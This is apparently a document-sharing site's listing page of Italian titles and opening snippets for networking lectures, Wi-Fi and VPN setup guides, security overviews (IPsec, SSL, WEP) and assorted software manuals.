Reti di Telecomunicazione Lezione 8 Reti di Telecomunicazione Lezione 8 Marco Benini Corso di Laurea in Informatica marco.benini@uninsubria.it Livello di trasporto Programma della lezione relazione tra lo strato di trasporto e lo strato

Dettagli

1. RETI INFORMATICHE CORSO DI LAUREA IN INGEGNERIA INFORMATICA SPECIFICHE DI PROGETTO A.A. 2013/2014. 1.1 Lato client

1. RETI INFORMATICHE CORSO DI LAUREA IN INGEGNERIA INFORMATICA SPECIFICHE DI PROGETTO A.A. 2013/2014. 1.1 Lato client RETI INFORMATICHE - SPECIFICHE DI PROGETTO A.A. 2013/2014 1. RETI INFORMATICHE CORSO DI LAUREA IN INGEGNERIA INFORMATICA SPECIFICHE DI PROGETTO A.A. 2013/2014 Il progetto consiste nello sviluppo di un

Dettagli

Reti di Telecomunicazione Lezione 7

Reti di Telecomunicazione Lezione 7 Reti di Telecomunicazione Lezione 7 Marco Benini Corso di Laurea in Informatica marco.benini@uninsubria.it Il protocollo Programma della lezione file transfer protocol descrizione architetturale descrizione

Dettagli

Sommario. Introduzione alla Sicurezza Web

Sommario. Introduzione alla Sicurezza Web Sommario Introduzione alla Sicurezza Web Considerazioni generali IPSec Secure Socket Layer (SSL) e Transport Layer Security (TLS) Secure Electronic Transaction (SET) Introduzione alla crittografia Introduzione

Dettagli

Sicurezza a livello IP: IPsec e le reti private virtuali

Sicurezza a livello IP: IPsec e le reti private virtuali Sicurezza a livello IP: IPsec e le reti private virtuali Davide Cerri Sommario L esigenza di proteggere l informazione che viene trasmessa in rete porta all utilizzo di diversi protocolli crittografici.

Dettagli

Note per gli utenti dell'interfaccia wireless LAN

Note per gli utenti dell'interfaccia wireless LAN Note per gli utenti dell'interfaccia wireless LAN Leggere attentamente questo manuale prima di utilizzare la macchina e tenerlo a portata di mano per riferimento futuro. Note per gli utenti dell'interfaccia

Dettagli

FRITZ!WLAN Repeater 300E. Come estendere la copertura della rete Wi-Fi

FRITZ!WLAN Repeater 300E. Come estendere la copertura della rete Wi-Fi Come estendere la copertura della rete Wi-Fi 1 Introduzione La crescente diffusione di dispositivi portatili per il collegamento ad Internet ha reso la connettività senza fili una caratteristica imprescindibile

Dettagli

Un metodo per il rilevamento degli errori: la tecnica del Bit di Parità

Un metodo per il rilevamento degli errori: la tecnica del Bit di Parità Appunti: Tecniche di rilevazione e correzione degli errori 1 Tecniche di correzione degli errori Le tecniche di correzione degli errori sono catalogabili in: metodi per il rilevamento degli errori; metodi

Dettagli

W LAN. Qui di seguito si può vedere una tabella che mostra le differenze tra i diversi standard.

W LAN. Qui di seguito si può vedere una tabella che mostra le differenze tra i diversi standard. W LAN Una Wireless Local Area Network è una LAN che utilizza per la trasmissione dei dati le radiofrequenze invece del cavo. Normalmente viene utilizzata la banda ISM (Industrial Scientific Medical) che

Dettagli

Gestione degli indirizzi

Gestione degli indirizzi Politecnico di Milano Advanced Network Technologies Laboratory Gestione degli indirizzi - Address Resolution Protocol (ARP) - Reverse Address Resolution Protocol (RARP) - Dynamic Host Configuration Protocol

Dettagli

Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna (aggiornato al 8.4.2014)

Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna (aggiornato al 8.4.2014) Sistema di accesso ad internet tramite la rete Wireless dell Università di Bologna (aggiornato al 8.4.2014) Documento stampabile riassuntivo del servizio: la versione aggiornata è sempre quella pubblicata

Dettagli

Invio SMS. DM Board ICS Invio SMS

Invio SMS. DM Board ICS Invio SMS Invio SMS In questo programma proveremo ad inviare un SMS ad ogni pressione di uno dei 2 tasti della DM Board ICS. Per prima cosa creiamo un nuovo progetto premendo sul pulsante (Create new project): dove

Dettagli

Manuale Utente. Gestione Richieste supporto Data Warehouse. Della Ragioneria Generale dello Stato. Versione 1.0. Roma, Ottobre 2015

Manuale Utente. Gestione Richieste supporto Data Warehouse. Della Ragioneria Generale dello Stato. Versione 1.0. Roma, Ottobre 2015 Manuale Utente Gestione Richieste supporto Data Warehouse Della Ragioneria Generale dello Stato Versione 1.0 Roma, Ottobre 2015 1 Indice 1 Generalità... 3 1.1 Scopo del documento... 3 1.2 Versioni del

Dettagli

Dal protocollo IP ai livelli superiori

Dal protocollo IP ai livelli superiori Dal protocollo IP ai livelli superiori Prof. Enrico Terrone A. S: 2008/09 Protocollo IP Abbiamo visto che il protocollo IP opera al livello di rete definendo indirizzi a 32 bit detti indirizzi IP che permettono

Dettagli

LCMobile Restaurant. Guida su come usare il software per palmare LCMobile Restaurant.

LCMobile Restaurant. Guida su come usare il software per palmare LCMobile Restaurant. LCMobile Restaurant Guida su come usare il software per palmare LCMobile Restaurant. Per prima cosa bisogna installare il file LCMobile-Restaurant.exe sul proprio PC dove e collegata la base del palmare.

Dettagli

Guida Rapida all uso del License Manager di ROCKEY4Smart (V. 1.0.10.724)

Guida Rapida all uso del License Manager di ROCKEY4Smart (V. 1.0.10.724) Guida Rapida all uso del License Manager di ROCKEY4Smart (V. 1.0.10.724) Procedo con un esempio: voglio proteggere una applicazione (nell esempio Blocco Note di Windows: notepad.exe) per distribuirla con

Dettagli

Software Servizi Web UOGA

Software Servizi Web UOGA Manuale Operativo Utente Software Servizi Web UOGA S.p.A. Informatica e Servizi Interbancari Sammarinesi Strada Caiese, 3 47891 Dogana Tel. 0549 979611 Fax 0549 979699 e-mail: info@isis.sm Identificatore

Dettagli

Guida di Pro PC Secure

Guida di Pro PC Secure 1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 4) INFORMAZIONI AGGIUNTIVE 1) SOMMARIO Guida di Pro PC Secure Pro PC Secure è un programma che si occupa della protezione dagli attacchi provenienti

Dettagli

Sicurezza e rispetto della privacy, finalmente non in conflitto.

Sicurezza e rispetto della privacy, finalmente non in conflitto. Aylook e Privacy pag. 1 di 7 aylook, il primo sistema di videoregistrazione ibrida Privacy Compliant in grado di ottemperare alle richieste in materia di rispetto della privacy e dei diritti dei lavoratori.

Dettagli

LA TRASMISSIONE DELLE INFORMAZIONI QUARTA PARTE 1

LA TRASMISSIONE DELLE INFORMAZIONI QUARTA PARTE 1 LA TRASMISSIONE DELLE INFORMAZIONI QUARTA PARTE 1 I CODICI 1 IL CODICE BCD 1 Somma in BCD 2 Sottrazione BCD 5 IL CODICE ECCESSO 3 20 La trasmissione delle informazioni Quarta Parte I codici Il codice BCD

Dettagli

Un analisi dei problemi del WEP

Un analisi dei problemi del WEP ICT Security n.11 Aprile 2003 p. 1 di 6 Un analisi dei problemi del WEP In numeri precedenti di questa rivista sono già apparsi vari articoli che si sono occupati dei problemi di sicurezza del protocollo

Dettagli

Guida Compilazione Piani di Studio on-line

Guida Compilazione Piani di Studio on-line Guida Compilazione Piani di Studio on-line SIA (Sistemi Informativi d Ateneo) Visualizzazione e presentazione piani di studio ordinamento 509 e 270 Università della Calabria (Unità organizzativa complessa-

Dettagli

Dipartimento di Scienze Applicate

Dipartimento di Scienze Applicate DIPARTIMENTO DI SCIENZE APPLICATE Università degli Studi di Napoli Parthenope Centro Direzionale di Napoli Isola C4 80143 Napoli dsa@uniparthenope.it P. IVA 01877320638 Dipartimento di Scienze Applicate.

Dettagli

Manuale Amministratore Legalmail Enterprise. Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise

Manuale Amministratore Legalmail Enterprise. Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise Manuale Amministratore Legalmail Enterprise Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise Pagina 2 di 16 Manuale Amministratore Legalmail Enterprise Introduzione a Legalmail Enterprise...3

Dettagli

Configurazione client di posta elettronica per il nuovo servizio email. Parametri per la Configurazione dei client di posta elettronica

Configurazione client di posta elettronica per il nuovo servizio email. Parametri per la Configurazione dei client di posta elettronica Configurazione client di posta elettronica per il nuovo servizio email Questa guida si prefigge lo scopo di aiutare gli utenti a configurare i propri client di posta elettronica. Sono elencati passi da

Dettagli

GUIDA ALL UTILIZZO DEL PORTALE DELLA RETE DEI COMUNI OGLIO PO

GUIDA ALL UTILIZZO DEL PORTALE DELLA RETE DEI COMUNI OGLIO PO GUIDA ALL UTILIZZO DEL PORTALE DELLA RETE DEI COMUNI OGLIO PO Il portale della Rete dei Comuni Oglio Po risponde all url: http://www.comuniogliopo.it Il portale è un contenitore per i siti comunali degli

Dettagli

FRITZ!WLAN Repeater 300E come Access Point. FRITZ!WLAN Repeater 300E come Access Point Wi-Fi

FRITZ!WLAN Repeater 300E come Access Point. FRITZ!WLAN Repeater 300E come Access Point Wi-Fi FRITZ!WLAN Repeater 300E come Access Point Wi-Fi 1 Introduzione La connettività wireless (senza fili) è diventata una necessità fondamentale nell ambito della propria rete domestica o di quella dell ufficio,

Dettagli

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00 Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 200, ore 1.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome:

Dettagli

Comunicazioni sicure su Internet: https e SSL. Fisica dell Informazione

Comunicazioni sicure su Internet: https e SSL. Fisica dell Informazione Comunicazioni sicure su Internet: https e SSL Fisica dell Informazione Il servizio World Wide Web (WWW) Come funziona nel dettaglio il Web? tre insiemi di regole: Uniform Resource Locator (URL) Hyper Text

Dettagli

GUIDA ALLE SOLUZIONI

GUIDA ALLE SOLUZIONI Come posizionare una antenna indoor attiva o passiva per una ricezione ottimale? Come verificare in una stanza se il segnale digitale è presente? Perché effettuando la scansione con l antenna indoor non

Dettagli

Configurazione di accesso ad internet tramite la rete SWAN dell Università di Catania (aggiornato al 13/05/2015)

Configurazione di accesso ad internet tramite la rete SWAN dell Università di Catania (aggiornato al 13/05/2015) Configurazione di accesso ad internet tramite la rete SWAN dell Università di Catania (aggiornato al 13/05/2015) Windows 7 Sulle apparecchiature Access Point gestite dall Università è stata attivata la

Dettagli

Sicurezza dei sistemi e delle reti 1. Lezione VI: IPsec. IPsec. La suite TCP/IP. Mattia Monga. a.a. 2014/15

Sicurezza dei sistemi e delle reti 1. Lezione VI: IPsec. IPsec. La suite TCP/IP. Mattia Monga. a.a. 2014/15 Sicurezza dei sistemi e delle 1 Mattia Lezione VI: Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2014/15 1 cba 2011 15 M.. Creative Commons Attribuzione Condividi

Dettagli

Scambio delle chiavi. mercoledì 7 dicembre 2011

Scambio delle chiavi. mercoledì 7 dicembre 2011 Scambio delle chiavi 1 mercoledì 7 dicembre 2011 Distribuzione della chiave Dati due terminali A e B, si possono avere varie alternative per la distribuzione delle chiavi. 1. A sceglie una chiave e la

Dettagli

Parte II: Reti di calcolatori Lezione 24

Parte II: Reti di calcolatori Lezione 24 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14 Pietro Frasca Parte II: Reti di calcolatori Lezione 24 Martedì 27-05-2014 1 Una volta che una

Dettagli

La sicurezza nelle reti di calcolatori

La sicurezza nelle reti di calcolatori La sicurezza nelle reti di calcolatori Contenuti del corso La progettazione delle reti Il routing nelle reti IP Il collegamento agli Internet Service Provider e problematiche di sicurezza Analisi di traffico

Dettagli

WEB SEMINAR Dettaglio servizio

WEB SEMINAR Dettaglio servizio WEB SEMINAR Dettaglio servizio INTRODUZIONE L organizzazione di un web seminar prevede diverse e ben distinte fasi che iniziano con la promozione dell evento e si concludono con i report relativi alle

Dettagli

Informatica B a.a 2005/06 (Meccanici 4 squadra) PhD. Ing. Michele Folgheraiter

Informatica B a.a 2005/06 (Meccanici 4 squadra) PhD. Ing. Michele Folgheraiter Informatica B a.a 2005/06 (Meccanici 4 squadra) Scaglione: da PO a ZZZZ PhD. Ing. Michele Folgheraiter Architettura del Calcolatore Macchina di von Neumann Il calcolatore moderno è basato su un architettura

Dettagli

Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Ospiti LUSPIO

Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Ospiti LUSPIO Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Ospiti LUSPIO Requisiti Hardware Disporre di un terminale con scheda wireless compatibile con gli

Dettagli

MANUALE PARCELLA FACILE PLUS INDICE

MANUALE PARCELLA FACILE PLUS INDICE MANUALE PARCELLA FACILE PLUS INDICE Gestione Archivi 2 Configurazioni iniziali 3 Anagrafiche 4 Creazione prestazioni e distinta base 7 Documenti 9 Agenda lavori 12 Statistiche 13 GESTIONE ARCHIVI Nella

Dettagli

Plugin ImageJ Steganografia Digitale

Plugin ImageJ Steganografia Digitale Università degli Studi di Catania Facoltà di Scienze Matematiche, Fisiche e Naturali Corso di Laurea in Informatica (a.a. 2012/13) Plugin ImageJ Steganografia Digitale Massimiliano Portelli (matricola

Dettagli

Wi-Pie Social Network Punti di accesso alla Rete Internet Manuale d'uso

Wi-Pie Social Network Punti di accesso alla Rete Internet Manuale d'uso Wi-Pie Social Network Punti di accesso alla Rete Internet Manuale d'uso INDICE 1. INTRODUZIONE...3 2. MODALITÀ DI ACCESSO AL SERVIZIO...3 2.1 CONFIGURAZIONE PER ACCESSO WI-FI...3 3. UTILIZZO DEL SERVIZIO...4

Dettagli

Guida all accesso al portale e ai servizi self service

Guida all accesso al portale e ai servizi self service Guida all accesso al portale e ai servizi self service INDICE PREMESSA 2 pag. 1 INTRODUZIONE 2 2 MODALITÀ DI PRIMO ACCESSO 2 2.1 LA CONVALIDA DELL INDIRIZZO DI POSTA ELETTRONICA 2 2.2 L INSERIMENTO DELLA

Dettagli

Obiettivo: realizzazione di reti sicure TIPI DI ATTACCO. Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative

Obiettivo: realizzazione di reti sicure TIPI DI ATTACCO. Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative Obiettivo: realizzazione di reti sicure Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative Per quanto riguarda le scelte tecnologiche vi sono due categorie di tecniche: a) modifica

Dettagli

Progetto Istanze On Line

Progetto Istanze On Line 2009 Progetto Istanze On Line 20 marzo 2009 INDICE 1 INTRODUZIONE ALL USO DELLA GUIDA...3 1.1 SIMBOLI USATI E DESCRIZIONI...3 2 GESTIONE DELL UTENZA...4 2.1 COS È E A CHI È RIVOLTO...4 2.2 NORMATIVA DI

Dettagli

Sistemi di Antivirus CEFRIEL. Politecnico di Milano. Consorzio per la Formazione e la Ricerca in Ingegneria dell Informazione. Politecnico di Milano

Sistemi di Antivirus CEFRIEL. Politecnico di Milano. Consorzio per la Formazione e la Ricerca in Ingegneria dell Informazione. Politecnico di Milano Consorzio per la Formazione e la Ricerca in Ingegneria dell Informazione Politecnico di Milano Sistemi di Antivirus CEFRIEL Politecnico di Milano Antivirus I sistemi di antivirus sono dei software che

Dettagli

Manuale d'uso del Connection Manager

Manuale d'uso del Connection Manager Manuale d'uso del Connection Manager Edizione 1.0 2 Indice Informazioni sull'applicazione Gestione connessioni 3 Operazioni preliminari 3 Aprire l'applicazione Gestione connessioni 3 Visualizzare lo stato

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni

Dettagli

Sommario. 1. Cos è SecureDrive... 3. 1.1. Caratteristiche... 3. 1.1.1. Privacy dei dati: SecureVault... 4

Sommario. 1. Cos è SecureDrive... 3. 1.1. Caratteristiche... 3. 1.1.1. Privacy dei dati: SecureVault... 4 Allegato Tecnico Pagina 2 di 7 Marzo 2015 Sommario 1. Cos è... 3 1.1. Caratteristiche... 3 1.1.1. Privacy dei dati: SecureVault... 4 1.1.1.1. Funzione di Recupero del Codice di Cifratura... 4 1.1.2. Sicurezza

Dettagli

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15. Pietro Frasca. Parte II Lezione 5

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15. Pietro Frasca. Parte II Lezione 5 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15 Parte II Lezione 5 Giovedì 19-03-2015 1 Intensità del traffico e perdita dei pacchetti La componente

Dettagli

Maschere di sottorete a lunghezza variabile

Maschere di sottorete a lunghezza variabile Sottoreti Il CIDR (Classless Inter-Domain Routing) è un nuovo schema di indirizzamento introdotto nel 1993 per sostituire lo schema classful secondo il quale tutti gli indirizzi IP appartengono ad una

Dettagli

Guida alla registrazione on-line di un DataLogger

Guida alla registrazione on-line di un DataLogger NovaProject s.r.l. Guida alla registrazione on-line di un DataLogger Revisione 3.0 3/08/2010 Partita IVA / Codice Fiscale: 03034090542 pag. 1 di 17 Contenuti Il presente documento è una guida all accesso

Dettagli